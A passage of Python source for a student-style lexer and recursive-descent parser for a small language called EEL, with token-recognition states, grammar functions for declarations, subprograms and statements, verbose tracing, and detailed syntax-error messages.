token_dict[\"semiTK\"]\n return token_dict[\"semiTK\"]\n\n if unit == '(':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"lbrTK\"]\n\n return token_dict[\"lbrTK\"]\n\n if unit == ')':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"rbrTK\"]\n return token_dict[\"rbrTK\"]\n\n if unit == '[':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"blbrTK\"]\n return token_dict[\"blbrTK\"]\n\n if unit == ']':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"brbrTK\"]\n return token_dict[\"brbrTK\"]\n \n # -------------------[State 5 of the FSM]------------------- # \n # -Symbol ':' found. We must check if: #\n # [A]: Symbol '=' follows #\n # [B]: alphabetical or digit follows #\n # -IMPORTANT: Backtrack required for [B]! #\n # ---------------------------------------------------------- #\n\n if unit == ':':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '=': # [A]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"assigTK\"]\n return token_dict[\"assigTK\"]\n\n backtrack()\n ret_token = token_dict[\"colonTK\"]\n return token_dict[\"colonTK\"]\n\n # -------------------[State 6 of the FSM]------------------- #\n # -Symbol '<' found. We must check again if: #\n # [A]: Symbol '=' follows (lower equal operator '<=') #\n # [B]: Symbol '>' follows (different operatior '<>') #\n # [C]: else (lower operator '<') #\n # -IMPORTANT: Backtrack required for [C]! #\n # ---------------------------------------------------------- #\n\n if unit == '<':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == \"=\": # [A]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"leqTK\"]\n return token_dict[\"leqTK\"]\n\n if unit == \">\": # [B]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"difTK\"]\n return token_dict[\"difTK\"]\n\n # [C]\n\n backtrack()\n ret_token = token_dict[\"leqTK\"]\n return token_dict[\"leqTK\"]\n\n # -------------------[State 7 of the FSM]------------------- #\n # -Symbol '>' found. We must check if: #\n # [A]: Symbol '=' follows (greater equal operator '>=') #\n # [B]: else (greater operator '>') #\n # -IMPORTANT: Backtrack required for [B] #\n # ---------------------------------------------------------- #\n\n if unit == '>':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == \"=\": # [A]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"greqTK\"]\n return token_dict[\"greqTK\"]\n\n backtrack()\n ret_token = token_dict[\"greaTK\"]\n return token_dict[\"greaTK\"]\n\n # -------------------[State 8 of the FSM]------------------- # \n # -Uknown symbol found. Error! #\n # ---------------------------------------------------------- #\n\n print(\"\"\"[Lex()]::\\\n ***** ERROR *****\n -Uknown character found!\n \"\"\")\n print(\"[Lex()]:: Error found ~at line %d\"%(line))\n exit()\n\n lex_unit = \"EOF\"\n ret_token = token_dict[\"eofTK\"]\n return token_dict[\"eofTK\"]\n\n# Syntax Analysis #\n\n# -- ::= PROGRAM ID ENDPROGRAM -- #\ndef PROGRAM():\n \n if sys.argv[2] == \"-verbose\" : print(\" ===========> START OF SYNTAX !! <=========== \")\n if sys.argv[2] == \"-verbose\" : print(\"0.\")\n\n global ret_token\n\n if ret_token == token_dict[\"progTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print (\"\\tPROGRAM\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print (\"\\tPROGRAM\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print (\"*** PROGRAM ==> BLOCK ***\")\n BLOCK()\n \n if ret_token == token_dict[\"eprogTK\"]:\n \n if sys.argv[2] == \"-verbose\" : print (\"\\tPROGRAM\\t\" + lex_unit)\n lex() # EOF is expected\n\n if sys.argv[2] == \"-verbose\" : \n\n if ret_token == token_dict[\"eofTK\"]:\n\n print(\" ===========> END OF FILE REACHED <=========== \")\n\n \n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Every program shall end with word \"endprogram\" writen!\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n PROGRAM()\"\"\"%(line))\n\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Program name expected after \"program\"\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line %d\n \n ****************************** SYN ERROR ******************************\n PROGRAM()\"\"\"%(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Every program shall begin with word \"program\".\n --Instead You typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ****************************** \n PROGRAM()\"\"\"%(line))\n\n exit()\n\ndef BLOCK():\n\n if sys.argv[2] == \"-verbose\" : print(\"1.\")\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BLOCK ==> DECLARATIONS ***\")\n DECLARATIONS()\n if sys.argv[2] == \"-verbose\" : print(\"*** BLOCK ==> SUBPROGRAMS ***\")\n SUBPROGRAMS()\n if sys.argv[2] == \"-verbose\" : print(\"*** BLOCK ==> STATEMENTS ***\")\n STATEMENTS()\n\n# -- ::= e | DECLARE ENDDECLARE -- #\ndef DECLARATIONS():\n\n if sys.argv[2] == \"-verbose\" : print(\"2.\")\n \n global ret_token\n\n if ret_token == token_dict[\"decTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tDECLARATIONS\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** DECLARATIONS ==> VARLIST ***\")\n VARLIST() \n\n if ret_token == token_dict[\"edecTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tDECLARATIONS\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the variables \"enddeclare\" is expected \n --Instead You typed something else or forgot to type it.\n \n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n DECLARATIONS()\"\"\" %(line))\n\n exit()\n\n # e : No Declarations is acceptable\n\n# -- ::= e | ID (, ID)* -- #\ndef VARLIST():\n\n if sys.argv[2] == \"-verbose\" : print(\"3.\")\n\n global ret_token\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tVARLIST\\t\" + lex_unit)\n lex()\n\n while(ret_token == token_dict[\"commaTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tVARLIST\\t\" + lex_unit)\n lex()\n \n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tVARLIST\\t\" + lex_unit)\n lex() \n \n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After comma (',') you have to type a variable's name!\n ---[NOTE]: Read EEL's documentation file to see which\n words are allowed to be used as variable names! \n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n VARLIST()\"\"\" %(line))\n\n exit()\n\n # e : No Variables is acceptable\n\n# -- ::= ()* -- #\ndef SUBPROGRAMS():\n\n if sys.argv[2] == \"-verbose\" : print(\"4.\")\n\n global ret_token\n\n #Sneak Peek\n while(ret_token == token_dict[\"procTK\"] or ret_token == token_dict[\"funTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** SUBPROGRAMS ==> PROCORFUNC***\")\n PROCORFUNC()\n\n # e : Kleene-Star includes e! So missing Function or Procedure is acceptable\n\n# -- ::= PROCEDURE ID ENDPROCEDURE | \n# FUNCTION ID ENDFUNCTION -- #\ndef PROCORFUNC():\n\n if sys.argv[2] == \"-verbose\" : print(\"5.\")\n\n global ret_token\n\n if ret_token == token_dict[\"procTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNC ==> PROCORFUNCBODY ***\")\n PROCORFUNCBODY()\n \n if ret_token == token_dict[\"eprocTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n\n else: \n print(\"\"\" \n ****************************** SYN ERROR ******************************\n -Invalid Syntax\n --After declaring the procedure, you must type \"endprocedure\"\n --Instead you typed something else or forgot to type it!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --You must name the procedure you want to type!\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n exit()\n\n # No need to display an error message. If there was no procedure Token we wouldn't be here.\n\n elif ret_token == token_dict[\"funTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n \n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNC ==> PROCORFUNCBODY ***\")\n PROCORFUNCBODY()\n\n if ret_token == token_dict[\"efunTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the function, you must type \"endfunction\".\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n\n exit()\n\n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --You must name the function you want to type!\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d \n \n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n\n exit() \n # No need to display an error message. If there was no function Token we wouldn't be here.\n\n# -- -- #\ndef PROCORFUNCBODY():\n\n if sys.argv[2] == \"-verbose\" : print(\"6.\")\n\n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNCBODY ==> FORMALPARS ***\")\n FORMALPARS()\n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNCBODY ==> BLOCK ***\")\n BLOCK()\n\n# -- ::= () -- #\ndef FORMALPARS():\n\n if sys.argv[2] == \"-verbose\" : print(\"7.\")\n\n global ret_token\n\n if ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARS\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORMALPARS ==> FORMALPARLIST ***\")\n FORMALPARLIST()\n\n if ret_token == token_dict[\"rbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARS\\t\" + lex_unit)\n lex()\n \n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the procedure's/function's\n parameters you have to type ')'\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n FORMALPARS()\"\"\" %(line))\n \n exit() \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --To start declaring the procedure's/function's \n parameters you have to type '(' !\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORMALPARS()\"\"\" %(line))\n\n exit() \n\n# -- ::= (, )* | e -- #\ndef FORMALPARLIST():\n\n if sys.argv[2] == \"-verbose\" : print(\"8.\")\n\n global ret_token\n\n # Sneak Peek\n if (ret_token == token_dict[\"inTK\"] or ret_token == token_dict[\"inoutTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORMALPARLIST ==> FORMALPARITEM ***\")\n FORMALPARITEM()\n\n while(ret_token == token_dict[\"commaTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARLIST\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORMALPARLIST ==> FORMALPARITEM ***\")\n FORMALPARITEM()\n\n # e : Not deremining parameters is acceptable.\n\n# -- ::= IN ID | INOUT ID -- #\ndef FORMALPARITEM():\n\n if sys.argv[2] == \"-verbose\" : print(\"9.\")\n\n global ret_token\n\n if ret_token == token_dict[\"inTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the variable's scope (in) you have to \n name the variable (e.g in temp)\n --Instead you typed something else or forgot to type it!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORMALPARITEM()\"\"\" %(line))\n\n exit() \n\n elif ret_token == token_dict[\"inoutTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the variable's scope (in) you have to \n name the variable (e.g in temp)\n --Instead you typed something else or forgot to type it!\n \n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n FORMALPARITEM()\"\"\" %(line))\n exit()\n\n# -- ::= (;)* -- #\ndef STATEMENTS():\n\n if sys.argv[2] == \"-verbose\" : print(\"10.\")\n\n global ret_token\n \n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENTS ==> STATEMENT ***\")\n STATEMENT()\n\n while ret_token == token_dict[\"semiTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tSTATEMENTS\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENTS ==> STATEMENT ***\")\n STATEMENT()\n\n if ret_token == token_dict[\"alphaTK\"] or ret_token == token_dict[\"ifTK\"] or ret_token == token_dict[\"repTK\"] or ret_token == token_dict[\"whileTK\"] or ret_token == token_dict[\"exitTK\"] or ret_token == token_dict[\"swiTK\"] or ret_token == token_dict[\"fcaseTK\"] or ret_token == token_dict[\"callTK\"] or ret_token == token_dict[\"retTK\"] or ret_token == token_dict[\"inputTK\"] or ret_token == token_dict[\"printTK\"]:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After Statement ';' is expected (unless its the final one)\n --Instead you typed something else or forgot to type it!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n STATEMENTS()\"\"\" %(line))\n exit() \n\n# -- ::= e | | | | | \n# | | | | | \n# | -- #\ndef STATEMENT():\n\n if sys.argv[2] == \"-verbose\" : print(\"11. \")\n\n global ret_token\n\n # Sneak Peeks!\n if ret_token == token_dict[\"alphaTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> ASSIGNMENT_STAT ***\")\n ASSIGNMENT_STAT()\n elif ret_token == token_dict[\"ifTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> IF_STAT ***\")\n IF_STAT()\n elif ret_token == token_dict[\"repTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> REPEAT_STAT ***\")\n REPEAT_STAT()\n elif ret_token == token_dict[\"whileTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> WHILE_STAT ***\")\n WHILE_STAT()\n elif ret_token == token_dict[\"exitTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> EXIT_STAT ***\")\n EXIT_STAT()\n elif ret_token == token_dict[\"swiTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> SWITCH_STAT ***\")\n SWITCH_STAT()\n elif ret_token == token_dict[\"fcaseTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> FORCASE_STAT ***\")\n FORCASE_STAT()\n elif ret_token == token_dict[\"callTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> CALL_STAT ***\")\n CALL_STAT()\n elif ret_token == token_dict[\"retTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> RETURN_STAT ***\")\n RETURN_STAT()\n elif ret_token == token_dict[\"inputTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> INPUT_STAT ***\")\n INPUT_STAT()\n elif ret_token == token_dict[\"printTK\"]:\n if sys.argv[2] == \"-verbose\" : print(\"*** STATEMENT ==> PRINT_STAT ***\")\n PRINT_STAT()\n elif ret_token == \"\": \n # e : Not typing a statement is acceptable.\n pass\n\n# -- ::= ID := -- #\ndef ASSIGNMENT_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"12.\")\n\n global ret_token\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tASSIGNMENT_STAT\\t\" + lex_unit)\n lex()\n \n\n if ret_token == token_dict[\"assigTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tASSIGNMENT_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** ASSIGNMENT_STAT ==> EXPRESSION ***\")\n EXPRESSION()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Assignment operator ':=' not found!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n ASSIGNMENT_STAT()\"\"\" %(line))\n \n exit() \n\n # No need to display an error message here. If there was no alpha Token we wouldn't be here.\n\n# -- ::= IF THEN ENDIF -- #\ndef IF_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"13.\")\n\n global ret_token\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tIF_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** IF_STAT ==> CONDTITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"thenTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tIF_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** IF_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** IF_STAT ==> ELSEPART ***\")\n ELSEPART()\n\n if ret_token == token_dict[\"eifTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tIF_STAT\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"endif\" Commited word missing from if statement.\n --Instead you typed something else or forgot to type it!\n ---Example: if ... then ... endif\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n IF_STAT()\"\"\" %(line))\n\n exit()\n \n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"then\" Commited word missing from if statement.\n --Instead you typed something else or forgot to type it!\n ---Example: if ... then ... endif\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n IF_STAT()\"\"\" %(line))\n\n exit()\n \n# -- ::= e | ELSE -- #\ndef ELSEPART():\n\n if sys.argv[2] == \"-verbose\" : print(\"14.\")\n\n global ret_token\n\n if ret_token == token_dict[\"elseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tELSEPART\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** ELSEPART ==> STATEMENTS ***\")\n STATEMENTS()\n\n # e : Not determining an else part is acceptable.\n\n# -- ::= REPEAT ENDREPEAT -- #\ndef REPEAT_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"15.\")\n\n global ret_token\n\n if ret_token == token_dict[\"repTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tREPEAT_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** REPEAT_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n if ret_token == token_dict[\"erepTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tREPEAT_STAT\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"endrepeat\" Commited word missing from repeat statement.\n --Instead you typed something else or forgot to type it!\n ---Example: repeat ... endrepeat\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n REPEAT_STAT()\"\"\" %(line))\n exit()\n\n # No need to display an error message. If there was no repeat Token we wouldn't be here.\n\n# -- ::= EXIT -- #\ndef EXIT_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"16.\")\n\n global ret_token\n\n if ret_token == token_dict[\"exitTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tEXIT_STAT\\t\" + lex_unit)\n lex()\n \n\n # No need to display an error message. If there was no exit Token we wouldn't be here.\n\n# -- ::= WHILE ENDWHILE -- #\ndef WHILE_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"17.\")\n\n global ret_token\n\n if ret_token == token_dict[\"whileTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tWHILE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** WHILE_STAT ==> CONDITION ***\")\n CONDITION()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** WHILE_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n if ret_token == token_dict[\"ewhileTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tWHILE_STAT\\t\" + lex_unit)\n lex()\n \n # No need to display an error message. If there was no while Token we wouldn't be here.\n\n# -- ::= SWITCH ( CASE : \")\n\n global ret_token\n\n if ret_token == token_dict[\"swiTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> EXPRESSION ***\")\n EXPRESSION()\n \n\n if ret_token == token_dict[\"caseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n lex() \n \n if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> EXPRESSION ***\")\n EXPRESSION()\n \n if ret_token == token_dict[\"colonTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n # Sneak Peek\n while ret_token == token_dict[\"caseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> EXPRESSION ***\")\n EXPRESSION()\n\n if ret_token == token_dict[\"colonTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** SWITCH_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring case's expression colon ':' is expected!\n --Instead you forgot to type it or typed something else!\n ---Example: switch ... case ... : .... endswitch\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n SWITCH_STAT()\"\"\" %(line))\n exit()\n\n if ret_token == token_dict[\"eswiTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tSWITCH_STAT\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"endswitch\" Commited word missing from switch statement!\n --Instead you forgot to type it or typed something else!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n SWITCH_STAT()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n \n -Invalid Syntax\n --After declaring case's expression colon ':' is expected!\n --Instead you forgot to type it or typed something else!\n ---Example: switch ... case ... : .... endswitch\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n SWITCH_STAT()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the switch at least one case is required!\n --Instead you forgot to type it or typed something else!\n ---Example: switch ... case ... : .... endswitch\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n SWITCH_STAT()\"\"\" %(line))\n exit()\n\n # No need to display an error message. If there was no switch Token we wouldn't be here.\n\n# -- ::= FORCASE ( WHEN : )+ ENDFORCASE -- #\ndef FORCASE_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"19.\")\n\n global ret_token\n\n if ret_token == token_dict[\"fcaseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"whenTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"colonTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n # Sneak Peek\n while ret_token == token_dict[\"whenTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"colonTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORCASE_STAT ==> STATEMENTS ***\")\n STATEMENTS()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n -Invalid Syntax\n --After declaring forcase's condition colon ':' is expected\n --Instead you forgot to type it or typed something else!\n ---Example: forcase when ... : ... endforcase\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n if ret_token == token_dict[\"efcaseTK\"]: \n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORCASE_STAT\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"endforcase\" Commited word missing from forcase statement!\n --Instead you forgot to type it or typed something else!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring forcase's condition colon ':' is expected\n --Instead you forgot to type it or typed something else!\n ---Example: forcase when ... : ... endforcase\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n else: \n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --\"when\" Commited word expected after forcase!\n --Instead you forgot to type it or typed something else!\n ---Example: forcase when ... : ... endforcase\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORCASE_STAT()\"\"\" %(line))\n exit()\n\n# -- ::= CALL ID -- #\ndef CALL_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"20.\")\n\n global ret_token \n\n if ret_token == token_dict[\"callTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tCALL_STAT\\t\" + lex_unit)\n lex()\n \n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tCALL_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** CALL_STAT ==> ACTUALPARS ***\")\n ACTUALPARS()\n\n else: \n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Function's/Procedure's name is expected after call!\n --Instead you forgot to type it or typed something else!\n ---Example: call function1( ... )\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n CALL_STAT()\"\"\" %(line))\n\n exit()\n\n# -- ::= RETURN -- #\ndef RETURN_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"21.\")\n\n global ret_token\n\n if ret_token == token_dict[\"retTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRETURN_STAT\\t\" + lex_unit)\n lex() \n \n if sys.argv[2] == \"-verbose\" : print(\"*** RETURN_STAT ==> EXPRESSION ***\")\n 